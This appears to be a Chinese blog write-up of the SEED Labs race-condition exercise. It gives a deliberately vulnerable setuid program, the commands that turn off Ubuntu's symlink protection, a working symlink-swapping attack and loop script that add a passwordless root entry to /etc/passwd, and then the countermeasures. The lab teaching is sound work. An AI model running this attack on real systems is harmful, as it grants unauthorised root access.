Span_1024
Span_1024

[SEEDLab]竞争条件漏洞(Race Condition Vulnerability)

[SEEDLab]竞争条件漏洞(Race Condition Vulnerability)

实验PDF链接

Introduction

我们首先考虑这样的一个情景,我们有一个名为test的文件,它具有这样的权限:

-rwsr-xr-x 1 root seed   40 Jun  9 22:45 test

作为seed用户,我们无法对于此文件进行写入:
[SEEDLab]竞争条件漏洞(Race Condition Vulnerability)_第1张图片
但是,假设我们的系统中存在一个程序setuid_modifi.c

#include
#include

int main(){
	char * fn = "test";
	char buffer[60];
	FILE *fp;
	
	scanf("%50s", buffer );
	
	if(fp = fopen(fn, "a+") == NULL){
		printf("Error!");
	}
	else{
		fwrite("\n", sizeof(char), 1, fp);
		fwrite(buffer, sizeof(char), strlen(buffer), fp);
		fclose(fp);
	}
}

由它编译生成的可执行文件,然后执行sudo chown root setuid_modifisudo chmod 4755 setuid_modifi,此时得到的程序可以被seed用户执行,并且修改test文件之中的内容。为了避免这种情况,我们可以使用位于标准库unistd.h中的函数access()

int access(const char* pathname, int mode)
//判断路径为pathname的文件能否以mode的权限打开
//成功返回1,否则返回0

我们可以这样改写我们的程序:

//...
if(!access(fn, W_OK)){
    fp = fopen(fn, "a+");
	fwrite("\n", sizeof(char), 1, fp);
	fwrite(buffer, sizeof(char), strlen(buffer), fp);
	fclose(fp);
}
else 
	printf("No permission \n");
//....

这样,程序就会先检查实际用户是否真的具有权限(check)然后再去打开(open),这样,可以避免seed执行了具有root权限的程序去修改自身没有修改权限的文件。
看上去我们可以高枕无忧了,但事实果真如此吗?

Preparation

首先,我们需要关闭Ubuntu系统自带的保护

  • 对于12.04的系统,我们可以使用sudo sysctl -w kernel.yama.protected_sticky_symlinks=0
  • 对于比较常见的16.04的系统,可以使用sudo sysctl -w fs.protected_symlinks=0

之后,编译我们的具有漏洞的程序:

/* vulp.c */
#include 
#include
int main(){
	char * fn = "/tmp/XYZ";
	char buffer[60];
	FILE *fp;
	/* get user input */
	scanf("%50s", buffer );
	if(!access(fn, W_OK)){ //line1
		fp = fopen(fn, "a+"); //line2
		fwrite("\n", sizeof(char), 1, fp);
		fwrite(buffer, sizeof(char), strlen(buffer), fp);
		fclose(fp);
	}
	else printf("No permission \n");
}

可以看出,在line1和line2具有竞争条件漏洞。然后我们将其编译,然后set-uid

gcc vulp.c -o vulp
sudo chown root vulp
sudo chmod 4755 vulp

这样,我们便完成了我们的准备工作

Task1: Choosing Our Target

我们在确定加害方式之前,可以先去找一个无辜的受害者,我们选择一个非常重要的文件:/etc/passwd, 在这个文件里面存储了我们系统的用户和密码等等信息,我们查看其中的两条:

root:x:0:0:root:/root:/bin/bash
seed:x:1000:1000:seed,,,:/home/seed:/bin/bash

其中记录的含义是:

  1. 注册名,是唯一的;
  2. 密码,在Unix里面,密码不以明文形式存储,而采用密文,同时,为了防止受到已知明文攻击,还会采用一个特别的文件/etc/shadow,在这个里面存储着真正的密码,而在passwd里面只存储一个x
  3. UID,用户ID;
  4. GID,组ID;
  5. 用户名,包括真实姓名、邮箱、地址等等;
  6. 用户主目录名;
  7. 命令解释程序

来源链接

尽管我们的密码文件里面不会存储密文,但是程序依旧会解析密文,因而我们可以添加密文进入。可以使用perl的crypt函数,为了方便,我们可以使用空密码,运行:

perl -e 'print crypt("", "U6")."\n"'

得到了所谓的"magic number":U6aMy0wojraho, crypt的第一个参数为明文,第二个为salt。或许有些同学会问,这里我们是用U6是为了什么呢?答案是我也不知道hhh。事实上,你用U7什么的也可以,U7的结果为U7TJTzBqCUlfM,经本人测试是完全没有问题的,但是包括Google上,很多创建passwordless用户的教程用的都是这个密码,U6这个salt还是有点奇怪,可能是历史原因?
然后,我们可以创建这样一个条目:

test:U6aMy0wojraho:0:0:test:/root:/bin/bash

然后,将其添加到文件最后,我个人比较喜欢gedit,当然其他命令也是没问题的。
Result:
Result
查看结果之后,记得删除这个条目!

Task2: Launching the Race Condition Attack

在确定完作案目标之后,我们是时候干一票了。我们先查看竞争条件漏洞的原理。
首先,我们来看看我们的攻击程序:

//attack_process.c 
#include 
int main(void){ 
	while(1){ 
		unlink("/tmp/XYZ"); 
		symlink("/dev/null", "/tmp/XYZ"); 
		usleep(1000); 
		unlink("/tmp/XYZ"); 
		symlink("/etc/passwd", "/tmp/XYZ"); 
		usleep(1000); 
	}
	return 0; 
}

#!/bin/bash 
CHECK_FILE="ls -l /etc/passwd" 
old=$($CHECK_FILE) 
new=$($CHECK_FILE) 
while [ "$old" == "$new" ] do 
	./vulp < passwd_input 
	new=$($CHECK_FILE) 
done 
echo "STOP... The passwd file has been changed"

其中,passwd_input的内容为:test:U6aMy0wojraho:0:0:test:/root:/bin/bash
不难看出,我们一共需要运行两个进程,一个是我们的victim:vulp,另一个则是我们的adversary:attack_process,正常情况之下,victim将会正常进行,输出"No Permission",但是,在某个时间,可能发生如下情况:

  1. /tmp/XYZ被attacker指向dev/null
  2. victim运行到了access函数,因为/dev/null是全局可写(global writable),所以access判定为true;
  3. 此时,attacker恰好将/tmp/XYZ指向了/etc/passwd;
  4. victim执行了fopen,信息被写入etc/passwd,修改成功;

因而,我们可以得知相关几个相关文件的必须权限:

  1. /tmp/XYZ:链接文件,我们必须可以读写此文件,也就是说,如果你以root权限创建了链接,那么有可能会一直报"No Permission"
  2. /dev/null: 欺骗access的文件,对此文件我们必须具有写权限
  3. /etc/passwd,我们试图篡改的文件

Result:
[SEEDLab]竞争条件漏洞(Race Condition Vulnerability)_第2张图片
Then use su test, and enjoy your shell!

Task 3: Countermeasure: Applying the Principle of Least Privilege

这个principle的核心思想便是,在需要使用root的时候再使用root,在其他的时间,我们使用实际的UID进行我们的程序操作,代码如下。可以看到,我们在access之前,加入了函数seteuid,其可以在程序中设定我们的effective UID,避免出现错误赋予低权限用户高权限操作的漏洞。

/* vulp.c fixed with least privilege principle */ 
#include 
#include
int main(){ 
	uid_t real_uid = getuid(); 
	uid_t eff_uid = geteuid(); 
	char * fn = "/tmp/XYZ"; 
	char buffer[60]; 
	FILE *fp; 
	/* get user input */ 
	scanf("%50s", buffer ); 
	seteuid(real_uid); 
	if(!access(fn, W_OK)){ 
		usleep(1000); 
		fp = fopen(fn, "a+"); 
		fwrite("\n", sizeof(char), 1, fp); 
		fwrite(buffer, sizeof(char), strlen(buffer), fp); 
		fclose(fp); 
	}
	else
		printf("No permission \n"); 
	seteuid(eff_uid); 
	//other instructions.... 
}

这个之后的结果为:[SEEDLab]竞争条件漏洞(Race Condition Vulnerability)_第3张图片
这里报segment fault的原因是,在我们修改EID之后,事实上使用seed用户的身份去对root用户的相关内容进行操作,因为不同用户的内存空间不同,这回导致segment fault。

Task 4: Countermeasure: Using Ubuntu’s Built-in Scheme

把我们在preparation中关闭的保护措施打开就好,结果为
[SEEDLab]竞争条件漏洞(Race Condition Vulnerability)_第4张图片
至于这种保护措施的原理,我们可以在官方文档里面找到:

A long-standing class of security issues is the symlink-based time-of-check-time-of-use race, most commonly seen in world-writable directories like /tmp. The common method of exploitation of this flaw is to cross privilege boundaries when following a given symlink (i.e. a root process follows a symlink belonging to another user). For a likely incomplete list of hundreds of examples across the years, please see: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=/tmp

When set to “0”, symlink following behavior is unrestricted.

When set to “1” symlinks are permitted to be followed only when outside a sticky world-writable directory, or when the uid of the symlink and follower match, or when the directory owner matches the symlink’s owner.

This protection is based on the restrictions in Openwall and grsecurity.

你可能感兴趣的:(SEEDLab全逃课攻略)

  • 【夜读】提升生活品质的8个建议 茳淮秀水
    停止攀比很多人之所以感觉疲惫,部分原因是来自于跟别人攀比。殊不知,攀比得到的满足只是片刻的,过后往往会感到空虚。过分在意别人的评价,丢失的是自己原有的审美,扰乱的是自己最初的节奏。不妨活得洒脱些,自己内心丰盈了,快乐就能更持久。停止自责想改变自己,先从接纳自己开始。越是过分自责,就越难改变现状,因为如果把精力全耗在自责上,就没有精力用来改变了。遇到问题,我们要用正确的心态去面对。与其一味自责,不如
  • 【华为OD机试真题2023B卷 JAVA&JS】We Are A Team 若博豆 java算法华为javascript
    华为OD2023(B卷)机试题库全覆盖,刷题指南点这里WeAreATeam时间限制:1秒|内存限制:32768K|语言限制:不限题目描述:总共有n个人在机房,每个人有一个标号(1<=标号<=n),他们分成了多个团队,需要你根据收到的m条消息判定指定的两个人是否在一个团队中,具体的:1、消息构成为:abc,整数a、b分别代
  • 学霸父母学渣娃,这孩子真是亲生的?太扎心了! 东北SK皇家成长中心
    现在的社会,每个家庭基本都把孩子的教育放在第一位,哪怕父母平时上班再苦再累也不敢在孩子的教育上有丝毫的马虎,平时对孩子的照顾真的是无微不至,每天早起送孩子上学,晚上回家辅导孩子写作业,有的父母的文化程度非常高,但是每每到了辅导孩子写作业这个时候,父母们内心都有这样一种想法,这个孩子真的是我亲生的吗?真想一巴掌拍死他,我上辈子是做了什么孽生出这么一个智障的孩子,家里每每就要上演全武行,看看这些孩子到
  • 剧本杀《鲸鱼马戏团》剧本杀剧透+真相答案复盘解析攻略 VX搜_奶茶剧本杀
    本文为剧本杀《鲸鱼马戏团》剧本杀测评+部分真相复盘,获取完整真相复盘只需两步:①、关注微信公众号【奶茶剧本杀】→②、回复剧本杀《鲸鱼马戏团》即可获取查看剧本杀《鲸鱼马戏团》剧本杀真相答案复盘+凶手剧透:以下是玩家评测+部分关键证据,凶手,时间线,复盘解析,推理逻辑--------------------------------------------------------------------
  • 《经年驯养》黎栀傅谨臣(高分女频)全章节在线阅读 云轩书阁
    《经年驯养》黎栀傅谨臣(高分女频)全章节在线阅读主角:黎栀傅谨臣简介:傅谨臣养大黎栀,对她有求必应,黎栀以为那是爱。结婚两年才发现,她不过他豢养最好的一只宠物,可她拿他当全世界。关注微信公众号【看精灵】去回个书號【9328】,即可阅读【经年驯养】小说全文!第10章温柔的眼神,宠溺的动作,留恋的话近乎情人低语。是黎栀做梦都想要的一切……她口干舌燥,紧张难言。一颗心似被浸泡在温水里,酥麻舒适,无可抗拒
  • 2019考研 | 西交大软件工程 笔者阿蓉
    本科背景:某北京211学校电子信息工程互联网开发工作两年录取结果:全日制软件工程学院分数:初试350+复试笔试80+面试85+总排名:100+从五月份开始脱产学习,我主要说一下专业课和复试还有我对非全的一些看法。【数学100+】张宇,张宇,张宇。跟着张宇学习,入门视频刷一遍,真题刷两遍,错题刷三遍。书刷N多遍。从视频开始学习,是最快的学习方法。5-7月份把主要是数学学好,8-9月份开始给自己每个周
  • 辟谷日记 备谷6 玉衡_李俊晔
    备谷6图片发自App日期:18.1.31(周三)起床:7:30放假的日子,5:45的闹钟并没有关掉,每天也差不多这个点就朦朦胧胧醒了,有时不是真的醒了,就允许继续睡。今天似乎真的没什么睡意了——看来身体自然会有“够了”那个点,更加笃定:交托这词就是完完全全交托给身体,全然交托给宇宙,不需要任何评判,放下各种担心,恐惧,要求,内疚……在床上做逆转,思绪静不下来……知道成长就是做自己的主人,可以“掌控
  • Python算法L5:贪心算法 小熊同学哦 Python算法算法python贪心算法
    Python贪心算法简介目录Python贪心算法简介贪心算法的基本步骤贪心算法的适用场景经典贪心算法问题1.**零钱兑换问题**2.**区间调度问题**3.**背包问题**贪心算法的优缺点优点:缺点:结语贪心算法(GreedyAlgorithm)是一种在每一步选择中都采取当前最优或最优解的算法。它的核心思想是,在保证每一步局部最优的情况下,希望通过贪心选择达到全局最优解。虽然贪心算法并不总能得到全
  • 崩坏星穹铁道哪个角色值得培养 崩坏星穹铁道新手角色优先级教学 会飞滴鱼儿
    崩坏星穹铁道新手角色培养攻略:哪些角色值得投资?在《崩坏星穹铁道》中,角色的强度和培养一直是玩家们关心的焦点。要想体验更爽快的游戏过程,选对角色至关重要。那么,哪些角色值得投资培养呢?本篇教学文章将针对新手玩家,从T0到T1强度的角色中为你做出详尽解析。游戏豹官网现在的手游平台很多,但是在游戏界有这么一个传说:“喜欢肝的玩家不如氪金玩家,氪金玩家不如内部福利玩家”,这就是游戏界可悲的生物链,很多平
  • 2023-08-11 Tom梁
    当下,文玩之风可谓风靡,喜欢星月菩提的玩友越来多。有许多玩友发私信来问小编“盘玩星月菩提有没有攻略?”。所以今天给大家分享实用的星月菩提盘玩攻略,希望对大家有所帮助。一、挑选方法大家都知道挑选星月菩提的唯一标准就是密度。密度越低,上色越快;密度越高,上色就越慢。但是小编觉得高密籽更适合盘玩,虽然上色慢,但耐盘,生命周期比低密度的要长很多。那么怎么去判断它的密度呢?其实很简单,看星眼的大小、疏密、颜
  • 《错嫁傻王:王妃她又黑化了》南君宥乔洛染(独家小说)精彩TXT阅读 海边书楼
    《错嫁傻王:王妃她又黑化了》南君宥乔洛染(独家小说)精彩TXT阅读主角:南君宥乔洛染简介:堂堂21世纪金牌特种兵乔洛染,穿来的第一天,就被人诬陷私通被逼投江。而前来解救她的,正是她的夫婿——智力受损的痴傻王爷南君宥。傻子娶了一个不贞女,全京城都在等着看他们的笑话。殊不知,乔洛染一手医术济天下,一手制毒退万敌。关注微信公众号【花车文学】去回个书號【36】,即可阅读【错嫁傻王:王妃她又黑化了】小说全文
  • 日念一好(27)2022-1-7 思辰1218
    1、感恩科室欧阳同志,小冰箱出故障,设备科解决不了的问题,他三下五除二便解决了,节省时间与科室开支,工作上有如此伙伴,真是舒心!2、感恩小姐妹的惦念,出差祁东,发现好吃的马蹄,立马告知给我捎了些,瞬间涌上一股暖流。3、感恩全姐,送来一大袋好吃的纸皮核桃,大家齐分享,被爱包围的感觉棒极了。4、感恩芳芳昨晚的线上陪伴,一番电话粥让我倍受滋养。
  • 个人学习笔记7-6:动手学深度学习pytorch版-李沐 浪子L 深度学习深度学习笔记计算机视觉python人工智能神经网络pytorch
    #人工智能##深度学习##语义分割##计算机视觉##神经网络#计算机视觉13.11全卷积网络全卷积网络(fullyconvolutionalnetwork,FCN)采用卷积神经网络实现了从图像像素到像素类别的变换。引入l转置卷积(transposedconvolution)实现的,输出的类别预测与输入图像在像素级别上具有一一对应关系:通道维的输出即该位置对应像素的类别预测。13.11.1构造模型下
  • 全视通智慧病房系统旧病房改造方案 2301_78035670 解决方案人工智能大数据
    一、背景介绍在当今医疗技术日新月异的时代,智慧病房作为医院现代化建设的重要一环,正逐步从概念走向现实,深刻改变着患者的就医体验与医护人员的工作模式。智慧病房的改造背景,根植于医疗需求的日益增长、技术创新的不断推动以及对医疗质量与效率的不懈追求之中。二、医疗需求的深刻变革随着人口老龄化的加剧和慢性病患者数量的激增,医疗资源分配不均、医患沟通不畅、患者照护效率低下等问题日益凸显。传统的病房管理模式已难
  • 你会读书吗 阿杰说澄长
    一上学那会,朋友W报名了一个快速阅读培训课。出于好奇,我拿着他的培训资料进行了一个月的自我训练,并一度深陷其中。材料主要是无规则的符号以及横跨A4纸的连线,通过视线快速移动,扩大视幅来提升信息的接受速度,又通过图案和符号锻炼大脑的视觉记忆,摆脱音读习惯。那一个月,我沉溺其中,每天用很多的时间练习。一个月后,我确实做到了快速阅读,以句群接受信息,一目一行。只是速度虽快,却读过无痕,该知道的全忘记了。
  • 如何给QQ邮箱自动发邮件?无惧「小爱」下线!代码全公开,两步搞定 AI码上来 AI实战微信人工智能python
    前两天,搞了个微信AI小助理-小爱(AI),爸妈玩的不亦乐乎。零风险!零费用!我把AI接入微信群,爸妈玩嗨了,附教程(下)最近一直在迭代中,挖掘小爱的无限潜力:链接丢给它,精华吐出来!微信AI小助理太强了,附完整提示词拥有一个能倾听你心声的「微信AI小助理」,是一种什么体验?小爱打工,你躺平!让「微信AI小助理」接管你的文件处理,一个字:爽!我把多模态大模型接入了「小爱」,痛快来一场「表情包斗图」
  • 剧本杀谁是凶手《红瞳消逝之时》凶手是谁剧透+真相答案复盘解析攻略 VX搜_奶茶剧本杀
    本文为谁是凶手《红瞳消逝之时》剧本杀测评+部分真相复盘,获取完整真相复盘只需两步:①、关注微信公众号【奶茶剧本杀】→②、回复谁是凶手《红瞳消逝之时》即可获取查看谁是凶手《红瞳消逝之时》剧本杀真相答案复盘+凶手剧透:以下是玩家评测+部分关键证据,凶手,时间线,复盘解析,推理逻辑--------------------------------------------------------------
  • 尔勋禄攸 双髻山府正堂
    《曹全碑》全碑释文:碑阳君讳全,字景完,敦煌效谷人也,盖周胄,武秉乾机,翦伐殷商,既尔勋,禄攸同,封弟叔振铎于曹国,因氏焉,秦汉之际,曹参夹辅王室,世宗廓土斥竟,子孙迁于雍州之郊,分止右扶风,或在安定,或处武都,或居陇西,或家敦煌,枝分叶布,所在为雄,君高祖父敏,举孝廉,武威长史,巴郡朐忍令,张掖居延都尉,曾祖父述,孝廉,谒者,金城长史,夏阳令,蜀郡西部都尉,祖父凤,孝廉,张掖属国都尉丞,右扶风隃
  • 详细的等保测评攻略就在这里 快快小毛毛 网络网络安全系统安全
    信息安全等级保护,是对信息和信息载体按照重要性等级分级别进行保护的一种工作。目前我国实行的是等保2.0于2019年12月1日开始实施,等保2.0从传统的信息系统,转变成具有基础信息网络平台的多种新兴技术对象,即具有网络服务,有数据的网络服务平台都可以成为新兴的测评对象。等保2.0备案从原来的自主定级改变成系统定级,才能得到公安机关的备案,关于等保测评详细攻略如下:等保2.0定级步骤:确定定级对象—
  • 大学,你是荒废了还是努力了吗? 白曦月
    想想未来,你想要的生活是什么?当然光想也不行的,你得为之付出努力。如果你只是每日活于畅想中,你的梦想也只能是想想罢了。扪心自问,你为了你的梦想努力过吗?为了你想要的生活,从现在开始就该努力了吧?曾经一度,我认为大学就是用来干自己喜欢的事的。所以我利用所有没课的时间去图书馆。90%的课余时间全用来看课外书,做自己想做的事了。虽然在室友眼中,我很爱学习。但对于专业课,我从没认真学过。看着上学期期末的成
  • 《神雕侠侣2》张馨予一人分饰两角:小龙女李莫愁一人全包了 娱天下
    《神雕侠侣2》张馨予一人分饰两角,飘飘欲仙的小龙女,高冷却杀气十足的李莫愁,张馨予一个人成功进行了诠释,却没有丝毫的违和感。在没有看到宣传片的时候,很多人都说,张馨予的气质其实胜任不了小龙女,张馨予比较适合演都市御姐,在张馨予的小龙女造型出来之后,这个声音消失了,因为不管是声音动作神情,张馨予都表现的惟妙惟肖。《神雕侠侣2》也是张馨予久违的营业了,在张馨予结婚之后,其实很少能够看到张馨予的作品了,
  • 《姬魔恋战纪》如何跟妹子谈场不分手的恋爱! 专业搬砖小能手
    今天小编带你来梳理一下,国产galgame手机游戏《姬魔恋战纪》里的撩妹技巧,知己知彼才能百战百胜。刘备在主人公身边一直辅助主人公的女性,对主人公几乎有着无条件的信任。把丧失记忆的主人公当作上天派来的神使看待。对待主人公的态度非常温柔、宽容,但发现主人公偷懒后,会露出严厉的表情加以责备。兴趣是泡茶。在议事厅中泡茶给辛苦工作的主人公是她的一大乐趣之一。是一位温柔、善良的女性。攻略方式:遗迹冒险,多聊
  • MySQL锁 沉着冷静2024 MySQLmysql数据库
    MySQL锁文章目录MySQL锁MySQL中锁的分类创建索引时会锁表吗线上修改表结构会加什么锁Innodb存储引擎的行级锁有哪些Update语句中,不带where条件,加什么锁?MySQL实现乐观锁MySQL死锁MySQL死锁是怎么发生的?检查死锁如何避免死锁MySQL中锁的分类全局锁:主要用于全库逻辑备份表级锁:表锁、元数据锁、意向锁表锁:通过locktables语句对表进行加锁,它不仅限制其他
  • 今天到底是谁的生日 马蹄踏碎落叶
    在我的记忆中,最使我百思不得其解的就是奶奶的六十大寿,那天发生的事。早晨九点多,我们全家已经把家里打扫的一尘不染,为祝贺奶奶60大寿的东西也准备齐全了,一会儿小姑,大姑全来了!他们各自带了礼物。该准备午餐了,奶奶让我去拿围裙,一走进房间看见一地的瓜子壳,像下了雪似的积了厚厚一层。走进客厅姑父和大爷正在打牌,笑声此起彼伏,而老寿星奶奶呢却正在厨房烧菜,忙得像一只陀螺。大爷说:“我快渴死了,奶奶匆匆忙
  • 元宵节活动 湘子_5b16
    2019-2-19号深圳新东方烹饪学校组织了一场非常有意义的元宵节活动~即每人发30块代金券,用于购买其它班级元宵节展出的食品。听起来好诱人啊,我们可以买中餐班的泡椒凤爪,烧烤,火锅,东北夹馍饼,西餐的西式烩饭,BBQ烤全翅,三明治,法式烤土豆,香煎墨鱼丸,炸鸡米花,海草寿丝,鱼仔酱寿丝,西点班的小点心,奶茶,饼干,蛋糕,居然还有北京的冰糖胡芦…看到这么多花样多,品种多,又美味的东西,怎能不叫人垂
  • tushare库获取金融股票数据 罔闻_spider python进阶python
    定义:Tushare是一个为金融量化分析师和数据爱好者设计的开源工具,提供从数据采集、清洗加工到数据存储的全流程服务。它能够实时抓取沪深两市的股票和期货市场数据,包括交易价格、成交量、市值、市盈率等关键指标,同时也提供历史数据的采集。Tushare的数据采集功能是其核心优势之一,它支持多种数据类型,包括日K线数据和分钟级数据,满足不同分析需求。Tushare的数据清洗与加工功能提供了强大的工具集,
  • 《撩太子虐白莲重生皇妃太野》苏卿月(完结小说)&全文在线阅读【无弹窗】 寒风书楼
    《撩太子虐白莲重生皇妃太野》苏卿月(完结小说)&全文在线阅读【无弹窗】主角:苏卿月简介:前世她信了苏筱芸的伪善,落得个声名扫地、清誉全毁、家人遗弃、万人嫌恶的下场!关注微信公众号【海边书楼】去回个书号【158】,即可阅读【撩太子虐白莲重生皇妃太野】小说全文!不过片刻,前厅便只母女三人。思及苏卿月刚回来,姐妹二人正是联络感情的好时机,柳兰烟笑道:“芸儿,晚儿刚回来,对府里还不熟悉,不如你带她去逛逛,
  • 破解游戏app哪个好用 无限99999钻999999金币的游戏盒子排行榜 诸葛村夫123
    2024游戏盒子网站排行榜大全随着数位科技的发展,2024年手游市场持续火爆,各种新开手游持续涌现。本文为广大手游爱好者带来巅峰推荐,总结五个最具实力的手游新服发布网站,为您提供最全面的游戏资讯以及专业的游戏攻略。▶无限99999钻999999金币的游戏盒子排行榜TOP1:游戏豹官网特点:内部特权游戏类型:多类型推荐日活跃人数:15万网址链接:www.ystt88.cn游戏介绍:游戏豹官网以快速获
  • 我的神功手游氪金吗 我的神功怎么氪金最划算? 诸葛村夫123
    《我的神功手游》新手攻略:如何在不氪金的情况下玩得过瘾?《我的神功手游》充满了江湖情怀与有趣的剧情,许多玩家可能担心游戏中氪金成为享受内容的必要条件。然而,这款游戏为广大玩家提供了许多发展途径,让您在不氪金的情况下依然能够享受完整的江湖旅程。对于大多数游戏来说,职业其实就跟氪金挂钩的,某些属于氪金玩家专属的职业是平民玩家玩不起的,这就是为什么现在的手游失去了大多乐趣的原因,而现在很多人都是选择内部
  • CTF常见编码及加解密(超全)第二篇 不会代码的小徐 编码密码网络安全密码学预编码
    HTML实体编码简述:字符实体是用一个编号写入HTML代码中来代替一个字符,在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例:highlighter-HTML明文:hello,world.十进制:hello,world.十六进制:hel
  • 辗转相处求最大公约数 沐刃青蛟 C++漏洞
    无言面对”江东父老“了,接触编程一年了,今天发现还不会辗转相除法求最大公约数。惭愧惭愧!   为此,总结一下以方便日后忘了好查找。   1.输入要比较的两个数a,b   忽略:2.比较大小(因为后面要的是大的数对小的数做%操作)   3.辗转相除(用循环不停的取余,如a%b,直至b=0)   4.最后的a为两数的最大公约数 &
  • F5负载均衡会话保持技术及原理技术白皮书 bijian1013 F5负载均衡
    一.什么是会话保持?        在大多数电子商务的应用系统或者需要进行用户身份认证的在线系统中,一个客户与服务器经常经过好几次的交互过程才能完成一笔交易或者是一个请求的完成。由于这几次交互过程是密切相关的,服务器在进行这些交互过程的某一个交互步骤时,往往需要了解上一次交互过程的处理结果,或者上几步的交互过程结果,服务器进行下
  • Object.equals方法:重载还是覆盖 Cwind javagenericsoverrideoverload
    本文译自StackOverflow上对此问题的讨论。 原问题链接   在阅读Joshua Bloch的《Effective Java(第二版)》第8条“覆盖equals时请遵守通用约定”时对如下论述有疑问: “不要将equals声明中的Object对象替换为其他的类型。程序员编写出下面这样的equals方法并不鲜见,这会使程序员花上数个小时都搞不清它为什么不能正常工作:” pu
  • 初始线程 15700786134
          暑假学习的第一课是讲线程,任务是是界面上的一条线运动起来。            既然是在界面上,那必定得先有一个界面,所以第一步就是,自己的类继承JAVA中的JFrame,在新建的类中写一个界面,代码如下: public class ShapeFr
  • Linux的tcpdump 被触发 tcpdump
    用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支 持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 实用命令实例 默认启动 tcpdump 普通情况下,直
  • 安卓程序listview优化后还是卡顿 肆无忌惮_ ListView
    最近用eclipse开发一个安卓app,listview使用baseadapter,里面有一个ImageView和两个TextView。使用了Holder内部类进行优化了还是很卡顿。后来发现是图片资源的问题。把一张分辨率高的图片放在了drawable-mdpi文件夹下,当我在每个item中显示,他都要进行缩放,导致很卡顿。解决办法是把这个高分辨率图片放到drawable-xxhdpi下。 &nb
  • 扩展easyUI tab控件,添加加载遮罩效果 知了ing jquery
    (function () { $.extend($.fn.tabs.methods, { //显示遮罩 loading: function (jq, msg) { return jq.each(function () { var panel = $(this).tabs(&
  • gradle上传jar到nexus 矮蛋蛋 gradle
    原文地址: https://docs.gradle.org/current/userguide/maven_plugin.html configurations {     deployerJars } dependencies {     deployerJars "org.apache.maven.wagon
  • 千万条数据外网导入数据库的解决方案。 alleni123 sqlmysql
    从某网上爬了数千万的数据,存在文本中。 然后要导入mysql数据库。 悲剧的是数据库和我存数据的服务器不在一个内网里面。。 ping了一下, 19ms的延迟。 于是下面的代码是没用的。 ps = con.prepareStatement(sql); ps.setString(1, info.getYear())............; ps.exec
  • JAVA IO InputStreamReader和OutputStreamReader 百合不是茶 JAVA.io操作 字符流
    这是第三篇关于java.io的文章了,从开始对io的不了解-->熟悉--->模糊,是这几天来对文件操作中最大的感受,本来自己认为的熟悉了的,刚刚在回想起前面学的好像又不是很清晰了,模糊对我现在或许是最好的鼓励 我会更加的去学 加油!: JAVA的API提供了另外一种数据保存途径,使用字符流来保存的,字符流只能保存字符形式的流   字节流和字符的难点:a,怎么将读到的数据
  • MO、MT解读 bijian1013 GSM
    MO= Mobile originate,上行,即用户上发给SP的信息。MT= Mobile Terminate,下行,即SP端下发给用户的信息; 上行:mo提交短信到短信中心下行:mt短信中心向特定的用户转发短信,你的短信是这样的,你所提交的短信,投递的地址是短信中心。短信中心收到你的短信后,存储转发,转发的时候就会根据你填写的接收方号码寻找路由,下发。在彩信领域是一样的道理。下行业务:由SP
  • 五个JavaScript基础问题 bijian1013 JavaScriptcallapplythisHoisting
    下面是五个关于前端相关的基础问题,但却很能体现JavaScript的基本功底。 问题1:Scope作用范围 考虑下面的代码:  (function() { var a = b = 5; })(); console.log(b); 什么会被打印在控制台上?  回答:         上面的代码会打印 5。 &nbs
  • 【Thrift二】Thrift Hello World bit1129 Hello world
    本篇,不考虑细节问题和为什么,先照葫芦画瓢写一个Thrift版本的Hello World,了解Thrift RPC服务开发的基本流程   1. 在Intellij中创建一个Maven模块,加入对Thrift的依赖,同时还要加上slf4j依赖,如果不加slf4j依赖,在后面启动Thrift Server时会报错 <dependency>
  • 【Avro一】Avro入门 bit1129 入门
    本文的目的主要是总结下基于Avro Schema代码生成,然后进行序列化和反序列化开发的基本流程。需要指出的是,Avro并不要求一定得根据Schema文件生成代码,这对于动态类型语言很有用。   1. 添加Maven依赖   <?xml version="1.0" encoding="UTF-8"?> <proj
  • 安装nginx+ngx_lua支持WAF防护功能 ronin47
    需要的软件:LuaJIT-2.0.0.tar.gz                   nginx-1.4.4.tar.gz          &nb
  • java-5.查找最小的K个元素-使用最大堆 bylijinnan java
    import java.util.Arrays; import java.util.Random; public class MinKElement { /** * 5.最小的K个元素 * I would like to use MaxHeap. * using QuickSort is also OK */ public static void
  • TCP的TIME-WAIT bylijinnan socket
    原文连接: http://vincent.bernat.im/en/blog/2014-tcp-time-wait-state-linux.html 以下为对原文的阅读笔记 说明: 主动关闭的一方称为local end,被动关闭的一方称为remote end 本地IP、本地端口、远端IP、远端端口这一“四元组”称为quadruplet,也称为socket 1、TIME_WA
  • jquery ajax 序列化表单 coder_xpf Jquery ajax 序列化
       checkbox 如果不设定值,默认选中值为on;设定值之后,选中则为设定的值   <input type="checkbox" name="favor" id="favor" checked="checked"/> $("#favor&quo
  • Apache集群乱码和最高并发控制 cuisuqiang apachetomcat并发集群乱码
    都知道如果使用Http访问,那么在Connector中增加URIEncoding即可,其实使用AJP时也一样,增加useBodyEncodingForURI和URIEncoding即可。 最大连接数也是一样的,增加maxThreads属性即可,如下,配置如下: <Connector maxThreads="300" port="8019" prot
  • websocket dalan_123 websocket
    一、低延迟的客户端-服务器 和 服务器-客户端的连接 很多时候所谓的http的请求、响应的模式,都是客户端加载一个网页,直到用户在进行下一次点击的时候,什么都不会发生。并且所有的http的通信都是客户端控制的,这时候就需要用户的互动或定期轮训的,以便从服务器端加载新的数据。   通常采用的技术比如推送和comet(使用http长连接、无需安装浏览器安装插件的两种方式:基于ajax的长
  • 菜鸟分析网络执法官 dcj3sjt126com 网络
      最近在论坛上看到很多贴子在讨论网络执法官的问题。菜鸟我正好知道这回事情.人道"人之患好为人师" 手里忍不住,就写点东西吧. 我也很忙.又没有MM,又没有MONEY....晕倒有点跑题. OK,闲话少说,切如正题. 要了解网络执法官的原理. 就要先了解局域网的通信的原理. 前面我们看到了.在以太网上传输的都是具有以太网头的数据包. 
  • Android相对布局属性全集 dcj3sjt126com android
    RelativeLayout布局android:layout_marginTop="25dip" //顶部距离android:gravity="left" //空间布局位置android:layout_marginLeft="15dip //距离左边距 // 相对于给定ID控件android:layout_above 将该控件的底部置于给定ID的
  • Tomcat内存设置详解 eksliang jvmtomcattomcat内存设置
